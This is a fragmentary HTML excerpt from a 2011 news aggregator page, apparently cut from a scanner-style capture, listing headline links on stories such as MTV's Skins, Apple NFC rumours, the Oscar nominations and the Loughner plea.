<div class="aa-inner"><a href="http://www.tvfanatic.com/2011/01/skins-review-tea/" target="_blank" class="usg-AFQjCNGde28JTbZjALerAo_OgFwYxHt0hw " id="MAA4AEgIUAJgAmoCdXM">Skins Review: Hot Lesbian Sex!!!</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEfWuNgYPg0ZILv5hSzruDwtuhpzQ " href="http://www.tmz.com/2011/01/24/skins-schick-mtv-commercial-pulled-ptc/" id="MAA4AEgIUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNENXxi-UPCdca1EUVCju-ionMEWqA " href="http://tunedin.blogs.time.com/2011/01/25/the-morning-after-second-skins/" id="MAA4AEgIUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGe7TwFsxpL5X7U8Mw3VwnLra2q2g " href="http://watching-tv.ew.com/2011/01/24/skins-mtv-child-porn-jersey-shore/" id="MAA4AEgIUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFeivtzBnx1HNPVs32vSjfRu97pGA " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406396.html" id="MAA4AEgIUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.siliconrepublic.com/digital-life/item/20087-iphone-5-and-ipad-2-may-use" class="usg-AFQjCNH19WnfEMcBXsW7low3TQ4dVVnAfg " title="Siliconrepublic.com"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/JQezVTDMGKi-tM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.siliconrepublic.com/digital-life/item/20087-iphone-5-and-ipad-2-may-use" class="usg-AFQjCNH19WnfEMcBXsW7low3TQ4dVVnAfg "> Siliconrepu... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFCBrtD7WCE0PtKw7H7t44smvuv5w " href="http://www.appleinsider.com/articles/11/01/25/apple_finalizing_wireless_e_wallet_for_iphone_5_ipad_2_report.html" id="MAA4AEgJUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://mashable.com/2011/01/25/apple-nfc-iphone-ipad/" target="_blank" class="usg-AFQjCNGm6-ErpYiEamahs9RkfVGAzI01dg " id="MAA4AEgJUAFgAmoCdXM">Apple to Add NFC Functionality to iPhone and iPad [REPORT]</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.mobileburn.com/news.jsp?Id=12601" target="_blank" class="usg-AFQjCNEWDXM8PnAha4yiIzgRne1A7thEHQ " id="MAA4AEgJUAJgAmoCdXM">Apple planning NFC mobile payment system for iPhone, iPad 2</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHW5C8tZea1E7rask8sdgGgqH1sqA " href="http://www.pcworld.com/article/217649/new_iphones_ipad_likely_to_become_ewallets.html" id="MAA4AEgJUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNESRVBr6N4Mw53zwxbWqMXsPJcc9w " href="http://www.bloomberg.com/news/2011-01-25/apple-plans-service-that-lets-iphone-users-pay-with-handsets.html" id="MAA4AEgJUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGtHdkHfBoAIG1s9jPpelMaz6s2AA " href="http://www.techtree.com/India/News/Next_iPhone_iPad_will_let_You_Make_Purchases/551-114271-893.html" id="MAA4AEgJUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHPeOouT9CckF0mUYysL730O7lrOg " href="http://www.ibtimes.com/articles/104716/20110125/apple-iphone-visa-mastercard-paypal-ebay-ipad-iphone-5-ipad-2-nfc-itunes-iad-google-google-checkout-.htm" id="MAA4AEgJUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.usatoday.com/life/movies/movieawards/oscars/2011-01-25-oscar-nominations-preview_N.htm" class="usg-AFQjCNFyRATycyqoonooqWdkAK0xpj1suQ " title="USA Today"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/tCst1ur0hPb3fM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.usatoday.com/life/movies/movieawards/oscars/2011-01-25-oscar-nominations-preview_N.htm" class="usg-AFQjCNFyRATycyqoonooqWdkAK0xpj1suQ "> USA Today </a>
...[SNIP]...
<div class="aa-inner"><a href="http://content.usatoday.com/communities/popcandy/post/2011/01/what-do-you-think-of-the-oscar-nominations/1" target="_blank" class="usg-AFQjCNF_4suxPRRgxXoa_8Zp5SHu3jf6jQ " id="MAA4AEgKUAFgAmoCdXM">What do you think of the Oscar nominations?</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.guardian.co.uk/film/2011/jan/25/oscars-colin-firth" target="_blank" class="usg-AFQjCNF7qCUzn_UOiBN60Cf4v4CoXreHbg " id="MAA4AEgKUAJgAmoCdXM">The King&#39;s Speech scores royal flush with 12 nods</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHod9JjR9y4F2FvohSndj5Y6BMBVw " href="http://www.chron.com/disp/story.mpl/ap/top/all/7396519.html" id="MAA4AEgKUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEsu-DnmHIBuFL0DwwwRk8Vd4hjlw " href="http://www.mtv.com/news/articles/1656582/2011-oscar-nominations.jhtml" id="MAA4AEgKUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEZ3l0V53faVCkMEw9KKd-PDkiE8w " href="http://www.cbsnews.com/stories/2011/01/25/entertainment/main7280739.shtml" id="MAA4AEgKUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHL90AF5QbOJ_4UIYIc-Ile0M2y9w " href="http://www.baltimoresun.com/news/sns-ap-us-oscar-nominations,0,4030183.story?track=rss" id="MAA4AEgKUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.telegraph.co.uk/technology/apple/8278278/Apples-App-store-hits-10-billionth-download.html" class="usg-AFQjCNFwrlLZUveAhyRcADwN9Y7RQ6glRA " title="Telegraph.co.uk"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/mJexcsYegVtuIM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.telegraph.co.uk/technology/apple/8278278/Apples-App-store-hits-10-billionth-download.html" class="usg-AFQjCNFwrlLZUveAhyRcADwN9Y7RQ6glRA "> Telegraph.c... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFD01jlTzuVK-p78scDRYNO2eREHw " href="http://www.computerworld.com/s/article/9205878/2011_Year_of_the_desktop_app_store_" id="MAA4AEgLUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.itproportal.com/2011/01/25/apple-app-store-goes-twitter/" target="_blank" class="usg-AFQjCNFFkgai6RxcDNfWyhHhpN-QWkC5dw " id="MAA4AEgLUAFgAmoCdXM">Apple App Store Goes On Twitter</a>
...[SNIP]...
<div class="aa-inner"><a href="http://news.cnet.com/8301-17852_3-20029276-71.html" target="_blank" class="usg-AFQjCNG8H2VktqAMsHReFNwIgHjafJM5Wg " id="MAA4AEgLUAJgAmoCdXM">Woman hangs up on $10000 call from Apple</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE4NKmZ-bO-krcRyPLnbE7HadO1ng " href="http://technolog.msnbc.msn.com/_news/2011/01/24/5907778-apple-calls-to-award-woman-10k-she-hangs-up" id="MAA4AEgLUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGzIPukqq0qd92l2yykeeaIvVTHug " href="http://www.bbc.co.uk/go/rss/int/news/-/newsbeat/12266806" id="MAA4AEgLUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHVgc2xuik70cWhAMH-Br_p_sihpA " href="http://www.mercurynews.com/business/ci_17186613" id="MAA4AEgLUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEmx71C1yiEGag4s2BvqaGBYMUQ3w " href="http://www.informationweek.com/news/hardware/handheld/showArticle.jhtml?articleID=229100083&amp;cid=RSSfeed_IWK_News" id="MAA4AEgLUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.straitstimes.com/BreakingNews/TechandScience/Story/STIStory_627942.html" class="usg-AFQjCNGALC7pTP_HmeRCjaHR1Jmr2aDqSg " title="Straits Times"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/oq6s9DrJF70jrM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.straitstimes.com/BreakingNews/TechandScience/Story/STIStory_627942.html" class="usg-AFQjCNGALC7pTP_HmeRCjaHR1Jmr2aDqSg "> Straits Tim... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGlOjCTDT0I5KjFM2nF9seR-UU1nA " href="http://www.allheadlinenews.com/briefs/articles/90032032?Heart%20disease%20costs%20expected%20to%20triple%20by%202030" id="MAA4AEgMUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://timesofindia.indiatimes.com/life-style/health-fitness/health/Lowering-BP-in-women-cuts-heart-disease-risk/articleshow/7361366.cms" target="_blank" class="usg-AFQjCNFVzg8Nh2UMpPqPxrXXGOK8ja_MPw " id="MAA4AEgMUAFgAmoCdXM">Lowering BP in women cuts heart disease risk</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.whec.com/news/stories/S1941039.shtml?cat=566" target="_blank" class="usg-AFQjCNE-xgnWt8tuHVa29gb4ru73IaOcRQ " id="MAA4AEgMUAJgAmoCdXM">Heart disease treatment costs expected to skyrocket</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFTF19UjawTG0U74K1vgENiWJteKg " href="http://www.businessweek.com/lifestyle/content/healthday/649165.html" id="MAA4AEgMUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE_rV0f77uJmyZiUMloBc2lXdf9Pw " href="http://www.webmd.com/hypertension-high-blood-pressure/news/20110124/heart-benefits-for-women-who-cut-hypertension" id="MAA4AEgMUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGYHaS-zthcCySdDAWNVHb4SLIrsw " href="http://ozarksfirst.com/fulltext?nxd_id=392206" id="MAA4AEgMUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGYF8ryq9Qwqi_CVynhSfiniesEPA " href="http://smartabouthealth.net/diseases/2011/01/25/blood-pressure-in-women-tied-to-risk-of-heart-disease/" id="MAA4AEgMUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://in.reuters.com/article/idINIndia-54381820110125" class="usg-AFQjCNGTd8WpG5SMNJTPCFWUSIrebxZMEA " title="Reuters India"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/cVcigKnuY3OZyM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://in.reuters.com/article/idINIndia-54381820110125" class="usg-AFQjCNGTd8WpG5SMNJTPCFWUSIrebxZMEA "> Reuters Ind... </a>
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=eVzgsG-PBuQ">Video:&nbsp;
Manila Bus Blast Leaves 4 Dead
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/idUSTRE70O1MV20110125" target="_blank" class="usg-AFQjCNG_i6tDzBrxVpfguEeyJgBOYOX5Rg " id="MAA4AEgNUAFgAmoCdXM">Four dead in Manila bus bombing; investigation starts</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGaMMS9N7gYyG5t5xc-JnYXzRSF5w " href="http://www.npr.org/templates/story/story.php?storyId=133201226" id="MAA4AEgNUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH9sGGWcAU2di9fzAAd-AOuP_4BpA " href="http://edition.cnn.com/2011/WORLD/asiapcf/01/25/philippines.bus.bomb/" id="MAA4AEgNUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGOxAIjsdF8I5HXIRAIm5yNB8OCHQ " href="http://www.voanews.com/english/news/asia/Philippines-Bus-Blast-Kills-2-114536154.html" id="MAA4AEgNUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.latimes.com/health/boostershots/la-heb-new-food-labels-20110124,0,7387257.story" class="usg-AFQjCNHIHuMYemJrbj1dujgRqym-0lbnUg " title="Los Angeles Times"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/KWy1eKrr9yjBVM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.latimes.com/health/boostershots/la-heb-new-food-labels-20110124,0,7387257.story" class="usg-AFQjCNHIHuMYemJrbj1dujgRqym-0lbnUg "> Los Angeles... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHIHuMYemJrbj1dujgRqym-0lbnUg " href="http://www.latimes.com/health/boostershots/la-heb-new-food-labels-20110124,0,7387257.story" id="MAA4AEgOUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.nacsonline.com/NACS/News/Daily/Pages/ND0125111.aspx" target="_blank" class="usg-AFQjCNEr5zGblJr5ydUyiba1wOen29-Mbw " id="MAA4AEgOUAFgAmoCdXM">Front-of-Pack Nutrition Labeling Initiative Launched</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406470.html" target="_blank" class="usg-AFQjCNHk9NOZPdqDFXddElh8m_lvKF2RbA " id="MAA4AEgOUAJgAmoCdXM">Firms bring nutrition labels to fore</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGamcPA0SL6kfHK0IbhjdKzrrU4yw " href="http://feeds.nytimes.com/click.phdo?i=4171574b1677b0877e85e5954148e69c" id="MAA4AEgOUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGpdj32WiL_7ZiNsnnO8kzBHN3vGA " href="http://www.reuters.com/article/idUSTRE70O04520110125?feedType=RSS&amp;feedName=domesticNews" id="MAA4AEgOUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGD_63K7i33pVnceXZLkDTbaItsoQ " href="http://www.usatoday.com/yourlife/food/diet-nutrition/2011-01-25-foodfight25_ST_N.htm" id="MAA4AEgOUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEIPTWyFOwFFj7H73Cs27lKSft3pQ " href="http://www.boston.com/business/articles/2011/01/25/nutrition_information_aimed_at_package_fronts/" id="MAA4AEgOUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.ctv.ca/CTVNews/World/20110121/ivory-coast-gbagbo-orders-un-vehicles-searched-110121/" class="usg-AFQjCNGRo6b-o5f6RtdHla89EEao1mK4LQ " title="CTV.ca"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/wd2GJA09xMOOhM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.ctv.ca/CTVNews/World/20110121/ivory-coast-gbagbo-orders-un-vehicles-searched-110121/" class="usg-AFQjCNGRo6b-o5f6RtdHla89EEao1mK4LQ "> CTV.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGh3ZjVoZGGhNMSHQsQxFWCIjQhDQ " href="http://www.voanews.com/english/news/africa/AU-Chief-in-Ivory-Coast-for-Talks-with-Rival-Leaders-114558329.html" id="MAA4AEgPUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.bloomberg.com/news/2011-01-25/cocoa-fluctuates-as-ivory-coast-permits-some-bean-exports-sugar-declines.html" target="_blank" class="usg-AFQjCNE3qOBHQefJ2oBBLri58rbv9LJZtQ " id="MAA4AEgPUAFgAmoCdXM">Cocoa Fluctuates as Ivory Coast Permits Some Bean Exports; Sugar Declines</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGurqi_xasll9AJrXYC-1MiIemnNw " href="http://allafrica.com/stories/201101250644.html" id="MAA4AEgPUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHFY83V_AAfjDtJZVh0a4dwPgg4bw " href="http://www.reuters.com/article/idUSLDE70O14P20110125" id="MAA4AEgPUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEBPU1Hcc-7k2RJJ76c88A5ASiKQw " href="http://af.reuters.com/article/investingNews/idAFJOE70O0EI20110125" id="MAA4AEgPUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGxQjL0Xe0xQJO9mKL3moYUdYmacQ " href="http://www.businessweek.com/news/2011-01-25/ivory-coast-s-ouattara-to-let-already-taxed-cocoa-to-be-shipped.html" id="MAA4AEgPUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://abcnews.go.com/Entertainment/slideshow/photos-oprah-winfrey-secret-halfsister-patricia--12298302" class="usg-AFQjCNFv3hauEKXd1KsbG6v3c4q6pDQOhw " title="ABC News"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/Z8UKO03JuMuYfM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://abcnews.go.com/Entertainment/slideshow/photos-oprah-winfrey-secret-halfsister-patricia--12298302" class="usg-AFQjCNFv3hauEKXd1KsbG6v3c4q6pDQOhw "> ABC News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNE7Fz5EwbxKGgzuAdjAkWwQIRJyKA " href="http://abcnews.go.com/Health/MindMoodNews/family-secrets-emotions-oprah-winfreys-revelation/story?id=12751870" id="MAA4AEgQUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=ashZeYCLLKw">Video:&nbsp;
Oprah Finds Sister She Didn't Know She Had
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406094.html" target="_blank" class="usg-AFQjCNHc8PRjJtA_r-6sLAipgOQmTkUeqw " id="MAA4AEgQUAFgAmoCdXM">Revelation of a half sister means an Oprah Winfrey family windfall</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHK46gYZdjQAXcbhaRli6LniG1SMQ " href="http://www.popfi.com/2011/01/25/oprahs-half-sister/" id="MAA4AEgQUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEpy8YlETU0ho_a7R_kPPB1fFhD1w " href="http://www.associatedcontent.com/article/6262014/oprah_winfrey_reunites_with_halfsister.html" id="MAA4AEgQUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHsWooEP8CzeSP994Mtc3uxXFR_Bg " href="http://www.philly.com/philly/entertainment/20110125_Sideshow__Oprah_reveals_her_secret__A_half-sister.html" id="MAA4AEgQUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEbHZ1QnEfcooEG3W8c8YZWD5vHHA " href="http://www.people.com/people/article/0,,20460315,00.html?xid=rss-topheadlines" id="MAA4AEgQUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N2DK20110125" class="usg-AFQjCNHPMVKKNx2mawktOtZ7l5FnrWvoIQ " title="Reuters"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/YNo9KTUQtZTd9M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N2DK20110125" class="usg-AFQjCNHPMVKKNx2mawktOtZ7l5FnrWvoIQ "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFARx2P5zNvWZAz4sw2rt6U-UJwnA " href="http://www.allheadlinenews.com/briefs/articles/90032000?McDonald%26%23146%3Bs%20hints%20of%20price%20increase%20this%20year" id="MAA4AEgRUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/idUSN2416456020110124" target="_blank" class="usg-AFQjCNHjS3vYRRTlA-qvmPbstYY5-pM5DA " id="MAA4AEgRUAFgAmoCdXM">CORRECTED - UPDATE 2-McDonald&#39;s December sales disappoint; shares fall</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.nytimes.com/2011/01/25/business/25mcdonald.html?src=twrhp" target="_blank" class="usg-AFQjCNEFCjzArnAipLxhgmi02CYhoR5miQ " id="MAA4AEgRUAJgAmoCdXM">Profit Edges Up at McDonald&#39;s, and Its Prices Will, Too</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFPrMDRNs8vkUnzFLUmjvLLidTZvA " href="http://online.wsj.com/article/SB10001424052748703555804576101771527131098.html" id="MAA4AEgRUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFfaDQUuI0976Cj63ad4cyPLpG_QQ " href="http://www.latimes.com/business/la-fi-0125-mcdonalds-20110124,0,874800.story" id="MAA4AEgRUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHUepzx7L2wWxrgonEJpWGfPPFYow " href="http://www.cnbc.com/id/41197027" id="MAA4AEgRUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.boston.com/sports/football/articles/2011/01/24/nfl_will_close_cowboys_stadium_roof_for_super_bowl/" class="usg-AFQjCNEghBWCFdvufR4bE6_z6OuV5dZ0pw " title="Boston Globe"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/qdO1rwvn09fEzM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.boston.com/sports/football/articles/2011/01/24/nfl_will_close_cowboys_stadium_roof_for_super_bowl/" class="usg-AFQjCNEghBWCFdvufR4bE6_z6OuV5dZ0pw "> Boston Glob... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHFh2GvvfmSVeefor8vLmuG3eJekw " href="http://travel.usatoday.com/flights/post/2011/01/delta-adds-wisconsin-dfw-flights-for-super-bowl/140051/1" id="MAA4AEgSUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.bizjournals.com/milwaukee/morning_roundup/2011/01/pack-gear-flies-as-dallas-flights-added.html" target="_blank" class="usg-AFQjCNFYl1bXTkZw_8xO3jwfmtUTgUPDMQ " id="MAA4AEgSUAFgAmoCdXM">Pack gear flies as Dallas flights added</a>
...[SNIP]...
<div class="aa-inner"><a href="http://lifeinc.todayshow.com/_news/2011/01/25/5908197-nfl-playoffs-flash-strong-buy-signal-for-stocks" target="_blank" class="usg-AFQjCNEpW0cGFBYoPK2aOSpry6U8jDARlA " id="MAA4AEgSUAJgAmoCdXM">NFL playoffs flash strong &#39;buy&#39; signal for stocks</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH4oXCRQbj0GVx75XGEVBl7lgmJXw " href="http://bleacherreport.com/articles/584247-super-bowl-2011-everything-you-need-to-know-for-a-great-super-bowl-sunday/entry/44040-super-bowl-2011-should-you-pay-the-price-and-travel-to-dallas" id="MAA4AEgSUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEqG8mxPehu8mJyffEBfUtvwnUaBQ " href="http://www.dallasnews.com/incoming/20110124-cowboys-owner-jerry-jones-excited-about-super-bowl-matchup.ece" id="MAA4AEgSUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHhmIjnxiBjSPpTi6HciKDhhlJklQ " href="http://denver.sbnation.com/denver-broncos/2011/1/25/1954559/super-bowl-history-green-bay-packers-last-appearance-denver-broncos" id="MAA4AEgSUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHeapDjp_UwWVx3OwaDOPDuOLCpZg " href="http://www.star-telegram.com/2011/01/24/2793479/jerry-jones-switches-focus-to.html" id="MAA4AEgSUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/25/AR2011012501351.html" class="usg-AFQjCNFHdQBswSmk7lUOk4Kcm7YBf0nwUw " title="Washington Post"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/-WrEkuynH2TOuM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/25/AR2011012501351.html" class="usg-AFQjCNFHdQBswSmk7lUOk4Kcm7YBf0nwUw "> Washington ... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHVqavhl78e1BGRhCFhDpMYchxwag " href="http://www.reuters.com/article/idUSN2525409520110125" id="MAA4AEgTUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.bloomberg.com/news/2011-01-25/dupont-sees-year-eps-3-45-3-75-saw-3-30-3-60-est-3-51.html" target="_blank" class="usg-AFQjCNExpii4NsuowkXIJMgslKUqBurpMA " id="MAA4AEgTUAFgAmoCdXM">DuPont Profit Drops Less Than Expected; 2011 Forecast Raised</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.marketwatch.com/story/us-stock-futures-slip-amid-earnings-deluge-2011-01-25?reflink=MW_news_stmp" target="_blank" class="usg-AFQjCNGcimztEVak-LjOqD7putfXoCzopQ " id="MAA4AEgTUAJgAmoCdXM">U.S. stock futures slip amid earnings deluge</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEi4oP6I32sCYAUCVJ2U9leGd96ag " href="http://www.rttnews.com/Content/USCommentary.aspx?Id=1534946&amp;SM=1" id="MAA4AEgTUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF3rk8geCFqCOxy1HwxiPyW1MZdvA " href="http://blogs.wsj.com/marketbeat/2011/01/25/dupont-results-top-views-as-revenue-jumps/" id="MAA4AEgTUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/news/world/suspect-pleads-not-guilty-in-deadly-arizona-shooting/article1881169/" class="usg-AFQjCNHXhvYT3CqqZhrlK0TlJfWxK54_Pw " title="Globe and Mail"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/n7jseiULnXrLMM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/news/world/suspect-pleads-not-guilty-in-deadly-arizona-shooting/article1881169/" class="usg-AFQjCNHXhvYT3CqqZhrlK0TlJfWxK54_Pw "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHsmAqMdXC30FFaEw2W0lsv51aXOA " href="http://online.wsj.com/article/SB20001424052748703555804576102350092762930.html" id="MAA4AEgUUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=AMxZxlkv-6o">Video:&nbsp;
Loughner Pleads Not Guilty in AZ Shooting
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://thecrimereport.org/2011/01/25/tucson-shooting-turning-point-in-death-penalty-debate/" target="_blank" class="usg-AFQjCNEgLCP1DEJ1f5ynlwK35JzR9GyByQ " id="MAA4AEgUUAFgAmoCdXM">Tucson Shooting: Turning Point In Death Penalty Debate?</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHzje_hMOUVpDUGpEX9sojDHX2M6w " href="http://www.npr.org/blogs/thetwo-way/2011/01/25/133188453/loughner-pleads-not-guilty" id="MAA4AEgUUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFIeq_Ns7Eg3Q1K7muYce5YVqST7Q " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406343.html" id="MAA4AEgUUANgCGoCdXM"><span class="titletext">
...[SNIP]...
